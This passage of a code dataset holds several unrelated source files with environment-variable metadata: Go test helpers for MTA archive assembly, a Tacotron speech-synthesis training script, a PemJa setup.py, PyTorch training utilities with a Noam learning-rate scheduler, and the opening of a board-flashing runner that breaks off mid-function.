Ω(cmdOut).Should(ContainSubstring("cleaning temporary files..." + "\n"))
Ω(resultMtarPath).Should(BeAnExistingFile())
validateMtaArchiveContents([]string{
"node.zip", "xs-security.json",
"node/", "node/.eslintrc", "node/.eslintrc.ext", "node/.gitignore", "node/.npmrc", "node/jest.json", "node/package.json", "node/runTest.js", "node/server.js",
"node/.che/", "node/.che/project.json",
"node/tests/", "node/tests/sample-spec.js",
}, resultMtarPath)
})
It("Assemble MTAR with MTA extension", func() {
bin := filepath.FromSlash(binPath)
			cmdOut, errOut, err := execute(bin, `assemble -e="my.mtaext"`, mtaAssemblePath)
Ω(err).Should(Succeed(), errOut)
Ω(cmdOut).ShouldNot(Equal(""))
Ω(resultMtarPath).Should(BeAnExistingFile())
// TODO the assemble command copies the contents of excluded modules to the archive (unrelated to the extension files) even though
// the modules are removed from the mtad.yaml and manifest.mf
validateMtaArchiveContents([]string{
"node.zip", "xs-security.json",
"node/", "node/.eslintrc", "node/.eslintrc.ext", "node/.gitignore", "node/.npmrc", "node/jest.json", "node/package.json", "node/runTest.js", "node/server.js",
"node/.che/", "node/.che/project.json",
"node/tests/", "node/tests/sample-spec.js",
}, resultMtarPath)
mtadContent, e := getFileContentFromZip(resultMtarPath, "mtad.yaml")
Ω(e).Should(Succeed())
actual, e := mta.Unmarshal(mtadContent)
Ω(e).Should(Succeed())
expected, e := mta.Unmarshal([]byte(`
_schema-version: "3"
ID: mta.assembly.example
version: 1.3.3
modules:
- name: example2
type: javascript.nodejs
path: node.zip
provides:
- name: backend
properties:
url: "${default-url}"
requires:
- name: assembly-uaa
resources:
- name: mta-assembly-uaa
type: org.cloudfoundry.managed-service
parameters:
service: xsuaa
service-plan: space
path: xs-security.json
`))
Ω(e).Should(Succeed())
Ω(actual).Should(Equal(expected))
})
})
})
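// getFileContentFromZip returns the content of the first entry in the archive
// whose name contains filename.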
func getFileContentFromZip(path string, filename string) ([]byte, error) {
zipFile, err := zip.OpenReader(path)
if err != nil {
return nil, err
}
defer zipFile.Close()
for _, file := range zipFile.File {
if strings.Contains(file.Name, filename) {
fc, err := file.Open()
if err != nil {
return nil, err
}
defer fc.Close() // If we got here there won't be another loop iteration
return ioutil.ReadAll(fc)
}
}
return nil, fmt.Errorf(`file "%s" not found`, filename)
}
func extractFileFromZip(archivePath string, filename string, dst string) error {
zipFile, err := zip.OpenReader(archivePath)
if err != nil {
return err
}
defer func() {
_ = zipFile.Close()
}()
var fileToExtract *zip.File = nil
for _, file := range zipFile.File {
if strings.Contains(file.Name, filename) {
fileToExtract = file
}
}
if fileToExtract == nil {
return fmt.Errorf(`file "%s" not found`, filename)
}
in, err := fileToExtract.Open()
if err != nil {
return err
}
defer func() {
_ = in.Close()
}()
err = dir.WriteFile(in, dst)
return err
}
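// validateMtaArchiveContents asserts that the archive contains exactly the expected entries
// plus the standard META-INF entries (MANIFEST.MF and mtad.yaml).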
func validateMtaArchiveContents(expectedAdditionalFilesInArchive []string, archiveLocation string) {
expectedFilesInArchive := append(expectedAdditionalFilesInArchive, "META-INF/", "META-INF/MANIFEST.MF", "META-INF/mtad.yaml")
validateArchiveContents(expectedFilesInArchive, archiveLocation)
}
func validateArchiveContents(expectedFilesInArchive []string, archiveLocation string) {
archive, err := zip.OpenReader(archiveLocation)
Ω(err).Should(Succeed())
defer func() {
_ = archive.Close()
}()
var filesInArchive []string
for _, file := range archive.File {
filesInArchive = append(filesInArchive, file.Name)
}
for _, expectedFile := range expectedFilesInArchive {
Ω(contains(expectedFile, filesInArchive)).Should(BeTrue(), fmt.Sprintf("expected %s to be in the archive; archive contains %v", expectedFile, filesInArchive))
}
for _, existingFile := range filesInArchive {
Ω(contains(existingFile, expectedFilesInArchive)).Should(BeTrue(), fmt.Sprintf("did not expect %s to be in the archive; archive contains %v", existingFile, filesInArchive))
}
}
func contains(element string, elements []string) bool {
for _, el := range elements {
if el == element {
return true
}
}
return false
}
// execute with live output
func executeWithOutput(bin string, args string, path string) error {
cmd := exec.Command(bin, strings.Split(args, " ")...)
cmd.Dir = path
cmdReader, err := cmd.StdoutPipe()
if err != nil {
return errors.Wrapf(err, "Error creating StdoutPipe for Cmd")
}
cmdErrReader, err := cmd.StderrPipe()
if err != nil {
return errors.Wrapf(err, "Error creating StderrPipe for Cmd")
}
scanner := bufio.NewScanner(cmdReader)
scannerErr := bufio.NewScanner(cmdErrReader)
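// Read both pipes in separate goroutines so the process output is printed live while the command runs.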
go func() {
for scanner.Scan() {
fmt.Printf("process output | %s\n", scanner.Text())
}
}()
go func() {
for scannerErr.Scan() {
fmt.Printf("process error output | %s\n", scannerErr.Text())
}
}()
err = cmd.Start()
if err != nil {
return errors.Wrapf(err, "Error starting Cmd")
}
err = cmd.Wait()
if err != nil {
return errors.Wrapf(err, "Error waiting for Cmd")
}
return nil
}
// Delete deployed app
func resourceCleanup(appName string) {
wd, _ := os.Getwd()
path := wd + filepath.FromSlash("/testdata/mta_demo")
bin := filepath.FromSlash("cf")
cmdOut, cmdErr, err := execute(bin, "delete "+appName+" -r -f", path)
Ω(err).Should(Succeed(), cmdErr)
Ω(cmdOut).ShouldNot(BeEmpty())
}
// executeEverySecond runs the command once per second until it returns '200' or 40 attempts have been made
func executeEverySecond(bin string, args string, path string) (cmdOut string, errorOut string, err error) {
n := 0
cmdOut, errOut, err := execute(bin, args, path)
for range time.Tick(time.Second) {
if n == 40 || strings.Compare(cmdOut, "'200'") == 0 {
break
}
cmdOut, errOut, err = execute(bin, args, path)
n++
}
return cmdOut, errOut, err
}
// Execute commands and get outputs
func execute(bin string, args string, path string) (output string, errorOutput string, err error) {
return executeWithArgs(bin, path, strings.Split(args, " ")...)
}
func executeWithArgs(bin string, path string, args ...string) (output string, errorOutput string, err error) {
// Build the command with its arguments
cmd := exec.Command(bin, args...)
// working directory for the command
cmd.Dir = path
// std out
stdoutBuf := &bytes.Buffer{}
cmd.Stdout = stdoutBuf
// std error
stdErrBuf := &bytes.Buffer{}
cmd.Stderr = stdErrBuf
// Start command
if err = cmd.Start(); err != nil {
return "", "", err
}
// wait for the command to finish
err = cmd.Wait()
return stdoutBuf.String(), stdErrBuf.String(), err
}
|
[
"\"GOPATH\"",
"\"NODE_APP_ROUTE\""
] |
[] |
[
"GOPATH",
"NODE_APP_ROUTE"
] |
[]
|
["GOPATH", "NODE_APP_ROUTE"]
|
go
| 2 | 0 | |
train_tacotron.py
|
# coding: utf-8
import os
import time
import math
import argparse
import traceback
import subprocess
import numpy as np
from jamo import h2j
import tensorflow as tf
from datetime import datetime
from functools import partial
from hparams import hparams, hparams_debug_string
from tacotron import create_model, get_most_recent_checkpoint
from utils import ValueWindow, prepare_dirs
from utils import infolog, warning, plot, load_hparams
from utils import get_git_revision_hash, get_git_diff, str2bool, parallel_run
from utils.audio import save_wav, inv_spectrogram
from text import sequence_to_text, text_to_sequence
from datasets.datafeeder_tacotron import DataFeederTacotron, _prepare_inputs
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
import warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
log = infolog.log
def create_batch_inputs_from_texts(texts):
sequences = [text_to_sequence(text) for text in texts]
inputs = _prepare_inputs(sequences)
input_lengths = np.asarray([len(x) for x in inputs], dtype=np.int32)
for idx, (seq, text) in enumerate(zip(inputs, texts)):
recovered_text = sequence_to_text(seq, skip_eos_and_pad=True)
if recovered_text != h2j(text):
log(" [{}] {}".format(idx, text))
log(" [{}] {}".format(idx, recovered_text))
log("="*30)
return inputs, input_lengths
def get_git_commit():
subprocess.check_output(['git', 'diff-index', '--quiet', 'HEAD']) # Verify client is clean
commit = subprocess.check_output(['git', 'rev-parse', 'HEAD']).decode().strip()[:10]
log('Git commit: %s' % commit)
return commit
def add_stats(model, model2=None, scope_name='train'):
with tf.variable_scope(scope_name) as scope:
summaries = [
tf.summary.scalar('loss_mel', model.mel_loss),
tf.summary.scalar('loss_linear', model.linear_loss),
tf.summary.scalar('loss', model.loss_without_coeff),
]
if scope_name == 'train':
gradient_norms = [tf.norm(grad) for grad in model.gradients if grad is not None]
summaries.extend([
tf.summary.scalar('learning_rate', model.learning_rate),
tf.summary.scalar('max_gradient_norm', tf.reduce_max(gradient_norms)),
])
if model2 is not None:
with tf.variable_scope('gap_test-train') as scope:
summaries.extend([
tf.summary.scalar('loss_mel',
model.mel_loss - model2.mel_loss),
tf.summary.scalar('loss_linear',
model.linear_loss - model2.linear_loss),
tf.summary.scalar('loss',
model.loss_without_coeff - model2.loss_without_coeff),
])
return tf.summary.merge(summaries)
def save_and_plot_fn(args, log_dir, step, loss, prefix):
idx, (seq, spec, align) = args
audio_path = os.path.join(log_dir, '{}-step-{:09d}-audio{:03d}.wav'.format(prefix, step, idx))
align_path = os.path.join(log_dir, '{}-step-{:09d}-align{:03d}.png'.format(prefix, step, idx))
waveform = inv_spectrogram(spec.T,hparams)
save_wav(waveform, audio_path,hparams.sample_rate)
info_text = 'step={:d}, loss={:.5f}'.format(step, loss)
if 'korean_cleaners' in [x.strip() for x in hparams.cleaners.split(',')]:
log('Training korean: using jamo')
plot.plot_alignment( align, align_path, info=info_text, text=sequence_to_text(seq,skip_eos_and_pad=True, combine_jamo=True), isKorean=True)
else:
log('Training non-korean: not using jamo')
plot.plot_alignment(align, align_path, info=info_text,text=sequence_to_text(seq,skip_eos_and_pad=True, combine_jamo=False), isKorean=False)
def save_and_plot(sequences, spectrograms,alignments, log_dir, step, loss, prefix):
fn = partial(save_and_plot_fn,log_dir=log_dir, step=step, loss=loss, prefix=prefix)
items = list(enumerate(zip(sequences, spectrograms, alignments)))
parallel_run(fn, items, parallel=False)
log('Test finished for step {}.'.format(step))
def train(log_dir, config):
config.data_paths = config.data_paths # ['datasets/moon']
data_dirs = config.data_paths # ['datasets/moon\\data']
num_speakers = len(data_dirs)
config.num_test = config.num_test_per_speaker * num_speakers # 2*1
if num_speakers > 1 and hparams.model_type not in ["deepvoice", "simple"]:
raise Exception("[!] Unkown model_type for multi-speaker: {}".format(config.model_type))
commit = get_git_commit() if config.git else 'None'
checkpoint_path = os.path.join(log_dir, 'model.ckpt') # 'logdir-tacotron\\moon_2018-08-28_13-06-42\\model.ckpt'
#log(' [*] git rev-parse HEAD:\n%s' % get_git_revision_hash()) # hccho: commented out
log('='*50)
#log(' [*] git diff:\n%s' % get_git_diff())
log('='*50)
log(' [*] Checkpoint path: %s' % checkpoint_path)
log(' [*] Loading training data from: %s' % data_dirs)
log(' [*] Using model: %s' % config.model_dir) # 'logdir-tacotron\\moon_2018-08-28_13-06-42'
log(hparams_debug_string())
# Set up DataFeeder:
coord = tf.train.Coordinator()
with tf.variable_scope('datafeeder') as scope:
# The DataFeeder's 6 placeholders: train_feeder.inputs, train_feeder.input_lengths, train_feeder.loss_coeff, train_feeder.mel_targets, train_feeder.linear_targets, train_feeder.speaker_id
train_feeder = DataFeederTacotron(coord, data_dirs, hparams, config, 32,data_type='train', batch_size=config.batch_size)
test_feeder = DataFeederTacotron(coord, data_dirs, hparams, config, 8, data_type='test', batch_size=config.num_test)
# Set up model:
is_randomly_initialized = config.initialize_path is None
global_step = tf.Variable(0, name='global_step', trainable=False)
with tf.variable_scope('model') as scope:
model = create_model(hparams)
model.initialize(train_feeder.inputs, train_feeder.input_lengths,num_speakers, train_feeder.speaker_id,train_feeder.mel_targets, train_feeder.linear_targets,
train_feeder.loss_coeff,is_randomly_initialized=is_randomly_initialized)
model.add_loss()
model.add_optimizer(global_step)
train_stats = add_stats(model, scope_name='stats') # legacy
with tf.variable_scope('model', reuse=True) as scope:
test_model = create_model(hparams)
test_model.initialize(test_feeder.inputs, test_feeder.input_lengths,num_speakers, test_feeder.speaker_id,test_feeder.mel_targets, test_feeder.linear_targets,
test_feeder.loss_coeff, rnn_decoder_test_mode=True,is_randomly_initialized=is_randomly_initialized)
test_model.add_loss()
test_stats = add_stats(test_model, model, scope_name='test')
test_stats = tf.summary.merge([test_stats, train_stats])
# Bookkeeping:
step = 0
time_window = ValueWindow(100)
loss_window = ValueWindow(100)
saver = tf.train.Saver(max_to_keep=None, keep_checkpoint_every_n_hours=2)
sess_config = tf.ConfigProto(log_device_placement=False,allow_soft_placement=True)
#sess_config.gpu_options.allow_growth=True
#sess_config = tf.ConfigProto(log_device_placement=True)
sess_config.gpu_options.allow_growth=True
# Train!
with tf.Session(config=sess_config) as sess:
#with tf.Session() as sess:
try:
summary_writer = tf.summary.FileWriter(log_dir, sess.graph)
sess.run(tf.global_variables_initializer())
if config.load_path:
# Restore from a checkpoint if the user requested it.
restore_path = get_most_recent_checkpoint(config.model_dir)
saver.restore(sess, restore_path)
log('Resuming from checkpoint: %s at commit: %s' % (restore_path, commit), slack=True)
elif config.initialize_path:
restore_path = get_most_recent_checkpoint(config.initialize_path)
saver.restore(sess, restore_path)
log('Initialized from checkpoint: %s at commit: %s' % (restore_path, commit), slack=True)
zero_step_assign = tf.assign(global_step, 0)
sess.run(zero_step_assign)
start_step = sess.run(global_step)
log('='*50)
log(' [*] Global step is reset to {}'.format(start_step))
log('='*50)
else:
log('Starting new training run at commit: %s' % commit, slack=True)
start_step = sess.run(global_step)
train_feeder.start_in_session(sess, start_step)
test_feeder.start_in_session(sess, start_step)
while not coord.should_stop():
start_time = time.time()
step, loss, opt = sess.run([global_step, model.loss_without_coeff, model.optimize], feed_dict=model.get_dummy_feed_dict())
time_window.append(time.time() - start_time)
loss_window.append(loss)
message = 'Step %-7d [%.03f sec/step, loss=%.05f, avg_loss=%.05f]' % (step, time_window.average, loss, loss_window.average)
log(message, slack=(step % config.checkpoint_interval == 0))
if loss > 100 or math.isnan(loss):
log('Loss exploded to %.05f at step %d!' % (loss, step), slack=True)
raise Exception('Loss Exploded')
if step % config.summary_interval == 0:
log('Writing summary at step: %d' % step)
feed_dict = {
**model.get_dummy_feed_dict(),
**test_model.get_dummy_feed_dict()
}
summary_writer.add_summary(sess.run( test_stats, feed_dict=feed_dict), step)
if step % config.checkpoint_interval == 0:
log('Saving checkpoint to: %s-%d' % (checkpoint_path, step))
saver.save(sess, checkpoint_path, global_step=step)
if step % config.test_interval == 0:
log('Saving audio and alignment...')
num_test = config.num_test
fetches = [
model.inputs[:num_test],
model.linear_outputs[:num_test],
model.alignments[:num_test],
test_model.inputs[:num_test],
test_model.linear_outputs[:num_test],
test_model.alignments[:num_test],
]
feed_dict = { **model.get_dummy_feed_dict(), **test_model.get_dummy_feed_dict()}
sequences, spectrograms, alignments, test_sequences, test_spectrograms, test_alignments = sess.run(fetches, feed_dict=feed_dict)
# librosa requires ffmpeg.
save_and_plot(sequences[:1], spectrograms[:1], alignments[:1], log_dir, step, loss, "train") # spectrograms: (num_test,200,1025), alignments: (num_test,encoder_length,decoder_length)
save_and_plot(test_sequences, test_spectrograms, test_alignments, log_dir, step, loss, "test")
except Exception as e:
log('Exiting due to exception: %s' % e, slack=True)
traceback.print_exc()
coord.request_stop(e)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--log_dir', default='logdir-tacotron_07')
parser.add_argument('--data_paths', default='./data/kss,./data/pcm')
parser.add_argument('--load_path', default=None) # takes precedence over 'initialize_path' below
#parser.add_argument('--load_path', default='logdir-tacotron/moon+son_2018-12-25_19-03-21')
parser.add_argument('--initialize_path', default=None) # restores the model from the checkpoint, but the global step starts from 0
parser.add_argument('--batch_size', type=int, default=64)
parser.add_argument('--num_test_per_speaker', type=int, default=2)
parser.add_argument('--random_seed', type=int, default=123)
parser.add_argument('--summary_interval', type=int, default=100000)
parser.add_argument('--test_interval', type=int, default=500) # 500
parser.add_argument('--checkpoint_interval', type=int, default=2000) # 2000
parser.add_argument('--skip_path_filter', type=str2bool, default=False, help='Use only for debugging')
parser.add_argument('--slack_url', help='Slack webhook URL to get periodic reports.')
parser.add_argument('--git', action='store_true', help='If set, verify that the client is clean.') # The store_true option automatically creates a default value of False.
config = parser.parse_args()
config.data_paths = config.data_paths.split(",")
setattr(hparams, "num_speakers", len(config.data_paths))
prepare_dirs(config, hparams)
log_path = os.path.join(config.model_dir, 'train.log')
infolog.init(log_path, config.model_dir, config.slack_url)
tf.set_random_seed(config.random_seed)
print(config.data_paths)
if any("krbook" not in data_path for data_path in config.data_paths) and hparams.sample_rate != 20000:
warning("Detect non-krbook dataset. May need to set sampling rate from {} to 20000".format(hparams.sample_rate))
if any('LJ' in data_path for data_path in config.data_paths) and hparams.sample_rate != 22050:
warning("Detect LJ Speech dataset. Set sampling rate from {} to 22050".format(hparams.sample_rate))
if config.load_path is not None and config.initialize_path is not None:
raise Exception(" [!] Only one of load_path and initialize_path should be set")
train(config.model_dir, config)
if __name__ == '__main__':
main()
|
[] |
[] |
[
"CUDA_VISIBLE_DEVICES"
] |
[]
|
["CUDA_VISIBLE_DEVICES"]
|
python
| 1 | 0 | |
setup.py
|
################################################################################
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
import io
import os
import sys
import sysconfig
import warnings
from distutils.command.build_ext import build_ext as old_build_ext
from setuptools import setup, Extension
if sys.version_info < (3, 7):
print('Python versions prior to 3.7 are not supported for PemJa.',
file=sys.stderr)
sys.exit(-1)
if sys.version_info >= (3, 10):
fmt = "Pemja may not yet support Python {}.{}."
warnings.warn(
fmt.format(*sys.version_info[:2]),
RuntimeWarning)
del fmt
this_directory = os.path.abspath(os.path.dirname(__file__))
version_file = os.path.join(this_directory, 'src/main/python/pemja/version.py')
try:
exec(open(version_file).read())
except IOError:
print("Failed to load PemJa version file for packaging. {0} not found!".format(version_file),
file=sys.stderr)
sys.exit(-1)
VERSION = __version__ # noqa
with io.open(os.path.join(this_directory, 'README.md'), 'r', encoding='utf-8') as f:
long_description = f.read()
_java_home = None
def get_java_home():
global _java_home
if _java_home is not None:
return _java_home
env_home = os.environ.get('JAVA_HOME')
if env_home:
if os.path.exists(env_home):
_java_home = env_home
return env_home
else:
print('Path {0} indicated by JAVA_HOME does not exist.'.format(env_home),
file=sys.stderr)
sys.exit(-1)
def is_osx():
return 'macosx' in sysconfig.get_platform()
def is_bsd():
return 'bsd' in sysconfig.get_platform()
def get_python_libs():
libs = []
if not is_bsd():
libs.append('dl')
return libs
def get_files(dir, pattern):
ret = []
for root, dirs, files in os.walk(dir):
for f in files:
if f.endswith(pattern):
ret.append(os.path.join(root, f))
return ret
def is_apple_jdk():
return get_java_home() == '/System/Library/Frameworks/JavaVM.framework'
def get_java_linker_args():
if is_apple_jdk():
return ['-framework JavaVM']
return []
def get_java_include():
inc_name = 'include'
if is_apple_jdk():
inc_name = 'Headers'
inc = os.path.join(get_java_home(), inc_name)
if not os.path.exists(inc):
print("Include folder should be at '{0}' but doesn't exist. "
"Please check you've installed the JDK properly.".format(inc),
file=sys.stderr)
sys.exit(-1)
jni = os.path.join(inc, "jni.h")
if not os.path.exists(jni):
print("jni.h should be in '{0}' but doesn't exist. "
"Please check you've installed the JDK properly.".format(jni),
file=sys.stderr)
sys.exit(-1)
paths = [inc]
# Include platform specific headers if found
include_linux = os.path.join(inc, 'linux')
if os.path.exists(include_linux):
paths.append(include_linux)
include_darwin = os.path.join(inc, 'darwin')
if os.path.exists(include_darwin):
paths.append(include_darwin)
include_bsd = os.path.join(inc, 'freebsd')
if os.path.exists(include_bsd):
paths.append(include_bsd)
return paths
def get_numpy_include():
numpy_include = []
try:
import numpy
include_path = os.path.join(numpy.__path__[0], 'core', 'include')
if os.path.exists(include_path):
print('numpy include found at', include_path)
numpy_include = [include_path]
except ImportError:
print('numpy not found', file=sys.stderr)
sys.exit(-1)
return numpy_include
def get_src_include():
return ['src/main/c/Include']
def _is_using_gcc(obj):
is_gcc = False
if obj.compiler.compiler_type == 'unix':
cc = sysconfig.get_config_var("CC")
if not cc:
cc = ""
is_gcc = "gcc" in cc
return is_gcc
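# build_ext variant that forces -std=c99 when the extensions are compiled with gcc.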
class build_ext(old_build_ext):
def build_extension(self, ext):
if _is_using_gcc(self):
if '-std=c99' not in ext.extra_compile_args:
ext.extra_compile_args.append('-std=c99')
old_build_ext.build_extension(self, ext)
extensions = ([
Extension(
name="pemja_core",
sources=get_files('src/main/c/pemja/core', '.c'),
libraries=get_python_libs(),
extra_link_args=get_java_linker_args(),
include_dirs=get_java_include() + ['src/main/c/pemja/core/include'] + get_numpy_include(),
language=3),
Extension(
name="pemja_utils",
sources=get_files('src/main/c/pemja/utils', '.c'),
extra_link_args=get_java_linker_args(),
include_dirs=get_java_include() + ['src/main/c/pemja/utils/include'],
language=3)
])
PACKAGE_DATA = {
'pemja': ['README.txt']
}
PACKAGE_DIR = {
'': 'src/main/python'
}
setup(
name='pemja',
version=VERSION,
packages=["pemja"],
include_package_data=True,
package_dir=PACKAGE_DIR,
package_data=PACKAGE_DATA,
author='Apache Software Foundation',
license='https://www.apache.org/licenses/LICENSE-2.0',
author_email='[email protected]',
python_requires='>=3.7',
install_requires=['numpy==1.19.5'],
cmdclass={'build_ext': build_ext},
description='PemJa',
long_description=long_description,
long_description_content_type='text/markdown',
zip_safe=False,
classifiers=[
'Development Status :: 5 - Production/Stable',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: Implementation :: CPython',
'Operating System :: Unix',
'Operating System :: MacOS', ],
ext_modules=extensions)
|
[] |
[] |
[
"JAVA_HOME"
] |
[]
|
["JAVA_HOME"]
|
python
| 1 | 0 | |
Repeat/MTDSite/utils.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
@File : utils.py
@Time : 2022/01/24 11:12:56
@Author : Jianwen Chen
@Version : 1.0
@Contact : [email protected]
@License : (C)Copyright 2021-2022, SAIL-Lab
'''
######################################## import area ########################################
# common library
import os
import random
import pickle
import torch
import torch.nn as nn
import numpy as np
from tqdm import tqdm
from sklearn import metrics
from torch.optim.lr_scheduler import _LRScheduler
######################################## function area ########################################
def seed_everything(seed=2021):
os.environ['PYTHONHASHSEED'] = str(seed)
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
def initialize_weights(model):
"""
Initializes the weights of a model in place.
:param model: An nn.Module.
"""
for param in model.parameters():
if param.dim() > 1:
nn.init.xavier_uniform_(param)
def loop(data_loader, model, optimizer, scheduler, device):
batch_size = data_loader.batch_size
data_loader = tqdm(data_loader) if optimizer is not None else data_loader
loss_sum, y_true, y_pred = 0.0, list(), list()
predictions = dict()
for batch in data_loader:
names, sequences, graphs, labels, masks = batch
graphs = graphs.to(device)
labels = labels.to(device)
outputs = model(graphs, masks, device)
# loss calculation
# pad_sequence needs CPU tensors in the model forward pass and GPU tensors in the loss calculation
masks = masks.to(device)
loss = cal_loss(labels, outputs, masks)
loss_sum += loss.data
if optimizer is not None:
# clear gradients for this training step
optimizer.zero_grad()
# back propagation, compute gradients
loss.backward()
# apply gradients
optimizer.step()
# NormLR needs step every batch
if scheduler is not None:
scheduler.step()
# collect result
labels = labels.detach().cpu().numpy()
scores = torch.softmax(outputs, dim=1)
scores = scores.detach().cpu().numpy()
scores = scores[:, 1]
for name, (idx, length) in zip(names, masks):
y_true.append(labels[idx:idx+length].tolist())
y_pred.append(scores[idx:idx+length].tolist())
predictions[name] = scores[idx:idx+length].tolist()
# clear cuda cache
torch.cuda.empty_cache()
# train with threshold = 0.5, test without using threshold
if optimizer is not None:
results = cal_metric(y_true, y_pred, best_threshold=0.5)
results['loss'] = loss_sum / (len(data_loader) * batch_size)
else:
results = cal_metric(y_true, y_pred, best_threshold=None)
return results, predictions
def cal_loss(y_true, y_pred, y_mask):
# y_true.shape = [batch_num_nodes], y_pred.shape = [batch_num_nodes, 2], total_loss.shape = [batch_num_nodes]
total_loss = nn.CrossEntropyLoss(reduction='none')(y_pred, y_true)
loss = 0.0
for idx, length in y_mask:
loss = loss + torch.mean(total_loss[idx:idx+length])
return loss
def cal_metric(y_true, y_pred, best_threshold=None):
concatenate_true, concatenate_pred = np.concatenate(y_true, axis=-1), np.concatenate(y_pred, axis=-1)
if best_threshold is None:
best_f1, best_threshold = 0, 0
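# No threshold given: grid-search thresholds 0.00-0.99 and keep the one with the best F1 score.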
for threshold in range(100):
threshold /= 100
binary_true = concatenate_true
binary_pred = [1 if pred >= threshold else 0 for pred in concatenate_pred]
f1 = metrics.f1_score(binary_true, binary_pred)
if f1 > best_f1:
best_f1, best_threshold = f1, threshold
binary_true = concatenate_true
binary_pred = [1 if pred >= best_threshold else 0 for pred in concatenate_pred]
accuracy = metrics.accuracy_score(binary_true, binary_pred)
auroc = metrics.roc_auc_score(binary_true, concatenate_pred)
mcc = metrics.matthews_corrcoef(binary_true, binary_pred)
TN, FP, FN, TP = metrics.confusion_matrix(binary_true, binary_pred).ravel()
sensitive = TP / (TP + FN)
specificity = TN / (FP + TN)
precision = TP / (TP + FP)
return {'accuracy': accuracy, 'auroc': auroc, 'mcc': mcc, 'sensitive': sensitive, 'specificity': specificity, 'precision': precision,'threshold': best_threshold}
class NoamLR(_LRScheduler):
"""
Noam learning rate scheduler with piecewise linear increase and exponential decay.
The learning rate increases linearly from init_lr to max_lr over the course of
the first warmup_steps (where warmup_steps = warmup_epochs * steps_per_epoch).
Then the learning rate decreases exponentially from max_lr to final_lr over the
course of the remaining total_steps - warmup_steps (where total_steps =
total_epochs * steps_per_epoch). This is roughly based on the learning rate
schedule from Attention is All You Need, section 5.3 (https://arxiv.org/abs/1706.03762).
"""
def __init__(self, optimizer, warmup_epochs, total_epochs, steps_per_epoch, init_lr, max_lr, final_lr):
"""
Initializes the learning rate scheduler.
:param optimizer: A PyTorch optimizer.
:param warmup_epochs: The number of epochs during which to linearly increase the learning rate.
:param total_epochs: The total number of epochs.
:param steps_per_epoch: The number of steps (batches) per epoch.
:param init_lr: The initial learning rate.
:param max_lr: The maximum learning rate (achieved after warmup_epochs).
:param final_lr: The final learning rate (achieved after total_epochs).
"""
assert len(optimizer.param_groups) == len(warmup_epochs) == len(total_epochs) == len(init_lr) == len(max_lr) == len(final_lr)
self.num_lrs = len(optimizer.param_groups)
self.optimizer = optimizer
self.warmup_epochs = np.array(warmup_epochs)
self.total_epochs = np.array(total_epochs)
self.steps_per_epoch = steps_per_epoch
self.init_lr = np.array(init_lr)
self.max_lr = np.array(max_lr)
self.final_lr = np.array(final_lr)
self.current_step = 0
self.lr = init_lr
self.warmup_steps = (self.warmup_epochs * self.steps_per_epoch).astype(int)
self.total_steps = self.total_epochs * self.steps_per_epoch
self.linear_increment = (self.max_lr - self.init_lr) / self.warmup_steps
self.exponential_gamma = (self.final_lr / self.max_lr) ** (1 / (self.total_steps - self.warmup_steps))
super(NoamLR, self).__init__(optimizer)
def get_lr(self):
"""Gets a list of the current learning rates."""
return list(self.lr)
def step(self, current_step: int = None):
"""
Updates the learning rate by taking a step.
:param current_step: Optionally specify what step to set the learning rate to.
If None, current_step = self.current_step + 1.
"""
if current_step is not None:
self.current_step = current_step
else:
self.current_step += 1
for i in range(self.num_lrs):
if self.current_step <= self.warmup_steps[i]:
self.lr[i] = self.init_lr[i] + self.current_step * self.linear_increment[i]
elif self.current_step <= self.total_steps[i]:
self.lr[i] = self.max_lr[i] * (self.exponential_gamma[i] ** (self.current_step - self.warmup_steps[i]))
else: # theoretically this case should never be reached since training should stop at total_steps
self.lr[i] = self.final_lr[i]
self.optimizer.param_groups[i]['lr'] = self.lr[i]
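# Example usage (hypothetical values, one entry per optimizer param group):
#   scheduler = NoamLR(optimizer, warmup_epochs=[2], total_epochs=[100], steps_per_epoch=500,
#                      init_lr=[1e-4], max_lr=[1e-3], final_lr=[1e-5])
#   then call scheduler.step() once per training batch.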
|
[] |
[] |
[
"PYTHONHASHSEED"
] |
[]
|
["PYTHONHASHSEED"]
|
python
| 1 | 0 | |
utils/gapy/runner/board/board_runner.py
|
#
# Copyright (C) 2019 GreenWaves Technologies
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import runner.default_runner
import os
import errors
import argparse
import json_tools as js
from elftools.elf.elffile import ELFFile
def appendArgs(parser: argparse.ArgumentParser, runnerConfig: js.config) -> None:
"""
Append specific module arguments.
"""
class Runner(runner.default_runner.Runner):
def __init__(self, args, config, system):
super(Runner, self).__init__(args, config, system)
def flash(self):
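# Flash every section marked content/flash: via plpbridge when GAP_USE_PLPBRIDGE is set,
# otherwise via OpenOCD with a chip- and flash-type-specific flasher command.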
for flash in self.get_flashs():
if flash.get_bool('content/flash'):
image = flash.get_str('content/image')
if os.environ.get('GAP_USE_PLPBRIDGE') is not None:
cmd = 'plpbridge --chip=%s --verbose 10 --cable=%s --flash-image=%s flash wait' % (os.environ.get('TARGET_NAME'), os.environ.get("PLPBRIDGE_CABLE"), image)
else:
if os.environ.get('GAPY_OPENOCD_CABLE') is not None:
self.config.set('openocd/cable', os.environ.get('GAPY_OPENOCD_CABLE'))
openocd = self.config.get_str("openocd/path")
cable = self.config.get_str('openocd/cable')
